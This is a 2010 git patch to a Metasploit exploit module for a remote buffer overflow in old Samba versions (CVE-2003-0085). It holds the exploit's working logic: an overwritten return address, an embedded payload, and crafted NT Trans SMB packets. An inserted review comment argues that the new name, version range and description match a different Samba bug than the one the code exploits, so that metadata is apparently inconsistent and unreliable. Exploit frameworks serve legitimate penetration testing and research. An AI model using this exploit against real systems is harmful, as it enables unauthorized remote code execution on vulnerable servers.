From 4f364e2830f1fdc8c33c996c40742383e848c3a5 Mon Sep 17 00:00:00 2001
From: Joshua Drake
Date: Wed, 28 Apr 2010 03:54:24 +0000
Subject: [PATCH] add description, versions, fix whitespace
git-svn-id: file:///home/svn/framework3/trunk@9167 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/multi/samba/nttrans.rb | 67 +++++++++++++------------
 1 file changed, 35 insertions(+), 32 deletions(-)
diff --git a/modules/exploits/multi/samba/nttrans.rb b/modules/exploits/multi/samba/nttrans.rb
index 17570685d4..2941a205d4 100644
--- a/modules/exploits/multi/samba/nttrans.rb
+++ b/modules/exploits/multi/samba/nttrans.rb
@@ -3,26 +3,30 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::SMB
 def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Samba nttrans Overflow',
+ super(update_info(info,
+ 'Name' => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow',
 'Description' => %q{
-
+ This module attempts to exploit a buffer overflow vulnerability present in
+ versions 2.2.2 through 2.2.6 of Samba.
+
+ The Samba developers report this as:
+ "Bug in the length checking for encrypted password change requests from clients."
+
+ The bug was discovered and reported by the Debian Samba Maintainers.
 },
 'Author' => [ 'hdm' ],
 'License' => MSF_LICENSE,
@@ -32,6 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
 [ 'CVE', '2003-0085' ],
 [ 'OSVDB', '6323' ],
 [ 'BID', '7106' ],
+ [ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ]
 ],
 'Privileged' => true,
 'Payload' =>
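Review bot: The new description appears to describe a different Samba bug from the one this module's code exercises: the quoted note about "length checking for encrypted password change requests" and the 2.2.2 - 2.2.6 range (together with the samba-2.2.7a history URL added in the references hunk) match the password-change fix shipped in 2.2.7a, whereas the existing CVE-2003-0085 / BID 7106 references, the 'Apr 7 2003' disclosure date and the NT Trans primary/secondary packets built in exploit() all point to the nttrans fragment-reassembly overflow, which as far as I recall was fixed in Samba 2.2.8 and tracked separately from the password-change issue (CVE-2002-1318). Please verify against the Samba 2.2.8 release notes; if that is the right advisory, the `%q{}` text should quote its nttrans entry, the 'Name' should drop the 2.2.2 - 2.2.6 range (e.g. `'Name' => 'Samba 2.2.x nttrans Buffer Overflow',`) and the URL should point at the 2.2.8 history page instead. Whichever way it resolves, the CVE, version range, description and URL need to agree with each other, because vulnerability-management and reporting tooling that keys on the CVE in this module's references will otherwise attribute the check to the wrong issue. initialize's body continues outside these hunks.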
@@ -40,9 +45,9 @@ class Metasploit3 < Msf::Exploit::Remote
 'BadChars' => "\x00",
 'MinNops' => 512,
 },
- 'Targets' =>
+ 'Targets' =>
 [
- ["Samba 2.2.x Linux x86",
+ [ "Samba 2.2.x Linux x86",
 {
 'Arch' => ARCH_X86,
 'Platform' => 'linux',
@@ -52,31 +57,29 @@ class Metasploit3 < Msf::Exploit::Remote
 ],
 'DisclosureDate' => 'Apr 7 2003'
 ))
-
- register_options(
- [
- Opt::RPORT(139)
- ], self.class)
-
+
+ register_options(
+ [
+ Opt::RPORT(139)
+ ], self.class)
 end
 def exploit
-
+
 # 0x081fc968
-
+
 pattern = Rex::Text.pattern_create(12000)
-
+
 pattern[532, 4] = [0x81b847c].pack('V')
 pattern[836, payload.encoded.length] = payload.encoded
- # 0x081b8138
-
+ # 0x081b8138
 connect
 smb_login
- targ_address = 0xfffbb7d0
-
+ targ_address = 0xfffbb7d0
+
 #
 # Send a NTTrans request with ParameterCountTotal set to the buffer length
 #
@@ -90,16 +93,16 @@ class Metasploit3 < Msf::Exploit::Remote
 pkt = CONST::SMB_NTTRANS_PKT.make_struct
 self.simple.client.smb_defaults(pkt['Payload']['SMB'])
-
+
 base_offset = pkt.to_s.length + (setup_count * 2) - 4
 param_offset = base_offset
 data_offset = param_offset + param.length
-
+
 pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT
 pkt['Payload']['SMB'].v['Flags1'] = 0x18
 pkt['Payload']['SMB'].v['Flags2'] = 0x2001
 pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count
-
+
 pkt['Payload'].v['ParamCountTotal'] =12000
 pkt['Payload'].v['DataCountTotal'] = body.length
 pkt['Payload'].v['ParamCountMax'] = 1024
@@ -111,12 +114,12 @@ class Metasploit3 < Msf::Exploit::Remote
 pkt['Payload'].v['SetupCount'] = setup_count
 pkt['Payload'].v['SetupData'] = setup_data
 pkt['Payload'].v['Subcommand'] = subcommand
-
+
 pkt['Payload'].v['Payload'] = data
-
+
 self.simple.client.smb_send(pkt.to_s)
 ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)
-
+
 #
 # Send a NTTrans secondary request with the magic displacement
 #
@@ -127,16 +130,16 @@ class Metasploit3 < Msf::Exploit::Remote
 pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct
 self.simple.client.smb_defaults(pkt['Payload']['SMB'])
-
+
 base_offset = pkt.to_s.length - 4
 param_offset = base_offset
 data_offset = param_offset + param.length
-
+
 pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY
 pkt['Payload']['SMB'].v['Flags1'] = 0x18
 pkt['Payload']['SMB'].v['Flags2'] = 0x2001
 pkt['Payload']['SMB'].v['WordCount'] = 18
-
+
 pkt['Payload'].v['ParamCountTotal'] = param.length
 pkt['Payload'].v['DataCountTotal'] = body.length
 pkt['Payload'].v['ParamCount'] = param.length
@@ -144,9 +147,9 @@ class Metasploit3 < Msf::Exploit::Remote
 pkt['Payload'].v['ParamDisplace'] = targ_address
 pkt['Payload'].v['DataCount'] = body.length
 pkt['Payload'].v['DataOffset'] = data_offset
-
+
 pkt['Payload'].v['Payload'] = data
-
+
 self.simple.client.smb_send(pkt.to_s)
 ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)